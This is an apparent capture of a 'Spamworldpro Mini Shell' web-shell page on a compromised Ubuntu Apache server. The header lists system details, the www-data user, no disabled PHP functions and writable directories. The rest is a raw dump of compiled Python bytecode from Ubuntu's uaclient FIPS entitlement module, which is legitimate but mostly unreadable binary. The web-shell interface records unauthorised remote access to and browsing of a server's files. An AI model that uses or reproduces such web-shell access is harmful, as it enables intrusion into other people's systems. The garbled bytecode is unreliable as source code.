Spamworldpro Mini Shell


Server : Apache/2.4.52 (Ubuntu)
System : Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
User : www-data ( 33)
PHP Version : 8.1.2-1ubuntu2.21
Disable Function : NONE
Directory :  /lib/python3/dist-packages/uaclient/entitlements/__pycache__/

current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //lib/python3/dist-packages/uaclient/entitlements/__pycache__/fips.cpython-310.pyc
o

���f�a�@s�ddlZddlZddlZddlmZddlmZmZmZm	Z	m
Z
ddlmZm
Z
mZmZmZmZmZddlmZmZddlmZddlmZddlmZdd	lmZdd
lmZddl m!Z!m"Z"ddl#m$Z$m%Z%m&Z&e�'�Z(e�)e�*e+��Z,gd
�Z-ddgZ.e-e.e-e.e-d�Z/gd�Z0gd�Z1gd�Z2e-e.e0e-e.e1e-e2d�Z3Gdd�dej4�Z5Gdd�de5�Z6Gdd�de5�Z7Gdd�de6�Z8dS)�N)�groupby)�Callable�List�Optional�Tuple�Union)�api�apt�event_logger�
exceptions�messages�system�util)�NoCloudTypeReason�get_cloud_type)�repo)�EntitlementWithMessage)�ApplicationStatus)�notices)�Notice)�ServicesOnceEnabledData�services_once_enabled_file)�MessagingOperations�MessagingOperationsDict�StaticAffordance)�
strongswan�strongswan-hmac�openssh-client�openssh-server�shim-signed�openssh-client-hmac�openssh-server-hmac)�xenial�bionic�focal)�openssl�libssl1.0.0�libssl1.0.0-hmac)r%�	libssl1.1�libssl1.1-hmac�libgcrypt20�libgcrypt20-hmacc	s�eZdZdZdZdZdZejj	Z
gd�Zedd��Z
ded	efd
d�Zdejfd
d�Zd	efdd�Zdejfdd�Z		d4dejdeeeded	df�fdd�
Zd	efdd�Z	d5deded	dfdd�Zded ed	ef�fd!d"�Zed	eed#ffd$d%��Zed	eef�fd&d'��Zd	ee eej!ff�fd(d)�Z"d6d*d+�Z#dejd	ef�fd,d-�Z$dejd	ef�fd.d/�Z%d0d1�Z&dejd	df�fd2d3�Z'�Z(S)7�FIPSCommonEntitlementi�zubuntu-pro-fips.gpgz/proc/sys/crypto/fips_enabledT)zfips-initramfszfips-initramfs-genericr*r+�libgmp10�libgnutls30�libhogweed6�
libnettle8r&r'r&r'r(r)�libssl3�
linux-fipsrr rr!r%zopenssl-fips-module-3rrrzubuntu-fipszubuntu-aws-fipszubuntu-azure-fips�ubuntu-gcp-fipscCs*t��j}t��rt�|g�St�|g�S)a�
        Dictionary of conditional packages to be installed when
        enabling FIPS services. For example, if we are enabling
        FIPS services in a machine that has openssh-client installed,
        we will perform two actions:

        1. Upgrade the package to the FIPS version
        2. Install the corresponding hmac version of that package
           when available.
        )r
�get_release_info�series�is_container�#FIPS_CONTAINER_CONDITIONAL_PACKAGES�get�FIPS_CONDITIONAL_PACKAGES)�selfr5�r;�</usr/lib/python3/dist-packages/uaclient/entitlements/fips.py�conditional_packages�s
z*FIPSCommonEntitlement.conditional_packages�
assume_yes�returncCs�t��j}|durt�d�dSt�d|�}t�d�}|durL|durL|�	d�}t�
d||�t�||�dkrJt�
tjj||d	��tjtj|d
�SdSt�d||�dS)
ztCheck if installing a FIPS kernel will downgrade the kernel
        and prompt for confirmation if it will.
        Nz Cannot gather kernel informationFz!(?P<kernel_version>\d+\.\d+\.\d+)r2�kernel_versionz*Kernel information: cur='%s' and fips='%s'r)�current_version�new_version)�msgr>z2Cannot gather kernel information for '%s' and '%s'T)r
�get_kernel_info�proc_version_signature_version�LOG�warning�re�searchr	�get_pkg_candidate_version�group�debug�version_compare�event�infor�KERNEL_DOWNGRADE_WARNING�formatr�prompt_for_confirmation�
PROMPT_YES_NO)r:r>�our_full_kernel_str�our_m�fips_kernel_version_str�our_kernel_version_strr;r;r<�prompt_if_kernel_downgrade�sJ�
�

������	��z0FIPSCommonEntitlement.prompt_if_kernel_downgrade�progresscCs�g}t��}tt|j�dd�d�}|D]\}}||vr||7}q|D](}ztj|gddigd�d�Wq"tjyJ|�dt	j
j|j|d	��Yq"wdS)
NcSs|�dd�S)Nz-hmac�)�replace)�pkg_namer;r;r<�<lambda>��zNFIPSCommonEntitlement.hardcoded_install_conditional_packages.<locals>.<lambda>)�key�DEBIAN_FRONTEND�noninteractive�z--allow-downgradesz$-o Dpkg::Options::="--force-confdef"z$-o Dpkg::Options::="--force-confold"��packages�override_env_vars�apt_optionsrO)�service�pkg)
r	�get_installed_packages_namesr�sortedr=�run_apt_install_commandr�UbuntuProError�emitr�FIPS_PACKAGE_NOT_AVAILABLErQ�title)r:rY�desired_packages�installed_packages�
pkg_groupsr\�pkg_listrhr;r;r<�&hardcoded_install_conditional_packages�s4��
�	����z<FIPSCommonEntitlement.hardcoded_install_conditional_packagescCs*tj|jjdd�}t��jdv}|p|S)Nzfeatures.fips_auto_upgrade_all��config�
path_to_value>r$r#r")r�is_config_value_true�cfgr
r4r5)r:�install_all_updates_override�hardcoded_releaser;r;r<�auto_upgrade_all_on_enable�s
�
z0FIPSCommonEntitlement.auto_upgrade_all_on_enablecCs�dd�t�|j�D�}|��t|�dkrJz"|�dtjjd�	|�d��|�
|�tj|ddigd	�d
�WdStj
yI|�dtj�YdSwdS)NcSsg|]}|j�qSr;)�name)�.0�packager;r;r<�
<listcomp>�s��zMFIPSCommonEntitlement.install_all_available_fips_upgrades.<locals>.<listcomp>rrO� )rdr`rarbrc)r	�;get_installed_packages_with_uninstalled_candidate_in_origin�origin�sort�lenrmr�INSTALLING_PACKAGESrQ�join�unhold_packagesrkrrl�FIPS_PACKAGES_UPGRADE_FAILURE)r:rY�
to_upgrader;r;r<�#install_all_available_fips_upgrades�s0����
�	��z9FIPSCommonEntitlement.install_all_available_fips_upgradesN�package_list�cleanup_on_failurecsl|j}|rt�j||d�n|�tjj|jd��|��r#|�	|�n|�
|�|��r4t�
tj�dSdS)z�Install contract recommended packages for the entitlement.

        :param package_list: Optional package list to use instead of
            self.packages.
        :param cleanup_on_failure: Cleanup apt files if apt install fails.
        )r��roN)rd�super�install_packagesrYr�INSTALLING_SERVICE_PACKAGESrQror|r�rt�_check_for_rebootr�addr�FIPS_SYSTEM_REBOOT_REQUIRED)r:rYr�r��mandatory_packages��	__class__r;r<r�s"��
��z&FIPSCommonEntitlement.install_packagescCst��S)z=Check if system needs to be rebooted because of this service.)r
�
should_reboot�r:r;r;r<r�8sz'FIPSCommonEntitlement._check_for_rebootF�	operation�silentcCsN|��}t�|�|r#|st�tjj|d��|dkr%t�t	j
�dSdSdS)z�Check if user should be alerted that a reboot must be performed.

        @param operation: The operation being executed.
        @param silent: Boolean set True to silence print/log of messages
        )r�zdisable operationN)r�rN�needs_rebootrOr�ENABLE_REBOOT_REQUIRED_TMPLrQrr�r�FIPS_DISABLE_REBOOT_REQUIRED)r:r�r��reboot_requiredr;r;r<�_check_for_reboot_msg<s
����z+FIPSCommonEntitlement._check_for_reboot_msgr5�cloud_idcs>|dkrtj|jjdd�rdS|dvrdStdt�jv�SdS)aVReturn False when FIPS is allowed on this cloud and series.

        On Xenial GCP there will be no cloud-optimized kernel so
        block default ubuntu-fips enable. This can be overridden in
        config with features.allow_xenial_fips_on_cloud.

        GCP doesn't yet have a cloud-optimized kernel or metapackage so
        block enable of fips if the contract does not specify ubuntu-gcp-fips.
        This also can be overridden in config with
        features.allow_default_fips_metapackage_on_gcp.

        :return: False when this cloud, series or config override allows FIPS.
        �gcez.features.allow_default_fips_metapackage_on_gcpruT)r#r$r3)rrxry�boolr�rd�r:r5r�r�r;r<�_allow_fips_on_cloud_instanceRs�z3FIPSCommonEntitlement._allow_fips_on_cloud_instance.cs^dddd�}t�\�}�durd�t��j�tjj���|���d�}|���fdd�d	ffS)
Nzan AWSzan Azureza GCP)�aws�azurer�rZ)r5�cloudcs�����S�N)r�r;�r�r:r5r;r<r]r^z:FIPSCommonEntitlement.static_affordances.<locals>.<lambda>T)	rr
r4r5r�FIPS_BLOCK_ON_CLOUDrQror8)r:�cloud_titles�_�blocked_messager;r�r<�static_affordancesqs

���z(FIPSCommonEntitlement.static_affordancescst��rgSt�jSr�)r
r6r�rdr�r�r;r<rd�szFIPSCommonEntitlement.packagescs�t���\}}t��rt��st�tj�||fSt	j
�|j�rSt�t
|j��s.t�tj�t�|j���dkrBt�tj�||fSt�tj�tjtjj|jd�fS|tjkr\||fStjtjfS)N�1)�	file_name)r��application_statusr
r6r�r�removerr��os�path�exists�FIPS_PROC_FILE�setrd�	load_file�strip�FIPS_MANUAL_DISABLE_URLr�r�DISABLEDr�FIPS_PROC_FILE_ERRORrQ�ENABLED�FIPS_REBOOT_REQUIRED)r:�super_status�	super_msgr�r;r<r��s:������
�z(FIPSCommonEntitlement.application_statuscCsTtt���}t|j��t|j��}|�|�}|r(t�t|�t	j
j|jd��dSdS)z�Remove fips meta package to disable the service.

        FIPS meta-package will unset grub config options which will deactivate
        FIPS on any related packages.
        r�N)
r�r	rird�
differencer=�intersection�remove_packages�listr�DISABLE_FAILED_TMPLrQro)r:rq�fips_metapackager�r;r;r<r��s
�
��z%FIPSCommonEntitlement.remove_packagescs8t��|�rt�tj�t�tj�t�tj�dSdS�NTF)r��_perform_enablerr�r�WRONG_FIPS_METAPACKAGE_ON_CLOUDr�r��r:rYr�r;r<r��s�z%FIPSCommonEntitlement._perform_enablecs(t��|�r|��rt�tj�dSdSr�)r��_perform_disabler�rr�rr�r�r�r;r<r��s�z&FIPSCommonEntitlement._perform_disablecCs|ddg}t�|tjjd�|�d��}g}|��D]}||vr#|�|�q|r<ddg|}t�|tjjd�|�d��}dSdS)Nzapt-mark�	showholdsr�)�command�unhold)r	�run_apt_commandr�EXECUTING_COMMAND_FAILEDrQr��
splitlines�append)r:�
package_names�cmd�holds�unholds�hold�
unhold_cmdr;r;r<r��s&�
����z%FIPSCommonEntitlement.unhold_packagescs|�|j�t��|�dS)z�Setup apt config based on the resourceToken and directives.

        FIPS-specifically handle apt-mark unhold

        :raise UbuntuProError: on failure to setup any aspect of this apt
           configuration
        N)r��fips_pro_package_holdsr��setup_apt_configr�r�r;r<r��sz&FIPSCommonEntitlement.setup_apt_config�NT)F)r?N))�__name__�
__module__�__qualname__�repo_pin_priority�
repo_key_filer��apt_noninteractiver�urls�FIPS_HOME_PAGE�help_doc_urlr��propertyr=r�rXr�ProgressWrapperrtr|r�rr�strr�r�r�r�rrr�rdr�NamedMessager�r�r�r�r�r��
__classcell__r;r;r�r<r,Vsp 
.
�#
�#��
���&���
�����
*
 r,cs�eZdZdZejZejZej	Z
dZejZ
edeedffdd��Zedeedff�fdd��Zedefd	d
��Zdejdef�fdd
�Z�ZS)�FIPSEntitlement�fips�
UbuntuFIPSr?.cCs:ddlm}ddlm}t|tj�tttj�t|tj	�fS)Nr)�LivepatchEntitlement��RealtimeKernelEntitlement)
�uaclient.entitlements.livepatchr��uaclient.entitlements.realtimer�rr�LIVEPATCH_INVALIDATES_FIPS�FIPSUpdatesEntitlement�FIPS_UPDATES_INVALIDATES_FIPS�REALTIME_FIPS_INCOMPATIBLE)r:r�r�r;r;r<�incompatible_servicess����z%FIPSEntitlement.incompatible_servicescs�t�j}t|jd�}tj}t|��d|k��t�	�}|r |j
nd�|tjj
|j|jd��fdd�dftjj
|j|jd��fdd�dffS)N)ryrF)r��fips_updatesc��Sr�r;r;)�is_fips_updates_enabledr;r<r](�z4FIPSEntitlement.static_affordances.<locals>.<lambda>cr�r�r;r;)�fips_updates_once_enabledr;r<r]/r�)r�r�r�ryrr�r�r�r�readr�r�$FIPS_ERROR_WHEN_FIPS_UPDATES_ENABLEDrQro�)FIPS_ERROR_WHEN_FIPS_UPDATES_ONCE_ENABLED)r:r�r��enabled_status�services_once_enabled_objr�)r�r�r<r�s2����
��
��z"FIPSEntitlement.static_affordancescCs|d}t��rtjj|jd�}|��stjg}n|j}d}|j	s-t
jdtjj|jd�ifg}t
jd|ifg|j
ifg||d�S�Nr�rC)�
pre_enable�pre_install�post_enable�pre_disable)r
r6r� PROMPT_FIPS_CONTAINER_PRE_ENABLErQror|�FIPS_RUN_APT_UPGRADE�pre_enable_msg�purgerrR�PROMPT_FIPS_PRE_DISABLErX�r:r�pre_enable_promptrr;r;r<�	messaging4�<������������zFIPSEntitlement.messagingrYcsRt�\}}|dur|tjkrt�d�t�tj�t	��
|�r't�t
j�dSdS)Nz>Could not determine cloud, defaulting to generic FIPS package.TF)rr�CLOUD_ID_ERRORrFrGrNrOr�.FIPS_COULD_NOT_DETERMINE_CLOUD_DEFAULT_PACKAGEr�r�rr�r�FIPS_INSTALL_OUT_OF_DATE)r:rY�
cloud_type�errorr�r;r<r�`s
��zFIPSEntitlement._perform_enable)r�r�r�r}r�
FIPS_TITLEro�FIPS_DESCRIPTION�description�FIPS_HELP_TEXT�	help_textr��PROMPT_FIPS_PRE_ENABLEr	r�rrr�rr�rrrr�r�r�r�r;r;r�r<r��s! +r�csneZdZdZejZdZejZ	ej
Zede
edffdd��Zedefdd��Zd	ejdef�fd
d�Z�ZS)r�zfips-updates�UbuntuFIPSUpdatesr?.cCs$ddlm}tttj�t|tj�fS)Nrr�)r�r�rr�r�FIPS_INVALIDATES_FIPS_UPDATES�"REALTIME_FIPS_UPDATES_INCOMPATIBLE)r:r�r;r;r<r�xs���z,FIPSUpdatesEntitlement.incompatible_servicescCs|d}t��rtjj|jd�}|��stjg}ntj}d}|j	s-t
jdtjj|jd�ifg}t
jd|ifg|j
ifg||d�Sr)r
r6rrrQror|r�PROMPT_FIPS_UPDATES_PRE_ENABLEr
rrRrrXrr;r;r<r�rz FIPSUpdatesEntitlement.messagingrYcs&t�j|d�rt�tdd��dSdS)N)rYT)r�F)r�r�r�writerr�r�r;r<r��s�z&FIPSUpdatesEntitlement._perform_enable)r�r�r�r}r�FIPS_UPDATES_TITLEror��FIPS_UPDATES_DESCRIPTIONr�FIPS_UPDATES_HELP_TEXTrr�rrr�rrrr�r�r�r�r;r;r�r<r�qs
 +r�csheZdZdZejZejZej	Z
dZejZ
dZedeedff�fdd��Zded	edefd
d�Z�ZS)�FIPSPreviewEntitlementzfips-preview�UbuntuFIPSPreviewzubuntu-pro-fips-preview.gpgr?.cst�jtttj�fSr�)r�r�rr�rrr�r�r;r<r��s
��z,FIPSPreviewEntitlement.incompatible_servicesr5r�cCsdSr�r;r�r;r;r<r��sz4FIPSPreviewEntitlement._allow_fips_on_cloud_instance)r�r�r�r}r�FIPS_PREVIEW_TITLEro�FIPS_PREVIEW_DESCRIPTIONr�FIPS_PREVIEW_HELP_TEXTrr��PROMPT_FIPS_PREVIEW_PRE_ENABLEr	r�r�rrr�r�r�r�r�r;r;r�r<r#�s"���r#)9�loggingr�rH�	itertoolsr�typingrrrrr�uaclientrr	r
rrr
r�uaclient.clouds.identityrr�uaclient.entitlementsr�uaclient.entitlements.baser�(uaclient.entitlements.entitlement_statusr�uaclient.filesr�uaclient.files.noticesr�uaclient.files.state_filesrr�uaclient.typesrrr�get_event_loggerrN�	getLogger�replace_top_level_logger_namer�rF�CONDITIONAL_PACKAGES_EVERYWHERE�!CONDITIONAL_PACKAGES_OPENSSH_HMACr9�&UBUNTU_FIPS_METAPACKAGE_DEPENDS_XENIAL�&UBUNTU_FIPS_METAPACKAGE_DEPENDS_BIONIC�%UBUNTU_FIPS_METAPACKAGE_DEPENDS_FOCALr7�RepoEntitlementr,r�r�r#r;r;r;r<�<module>sh$����������&xK
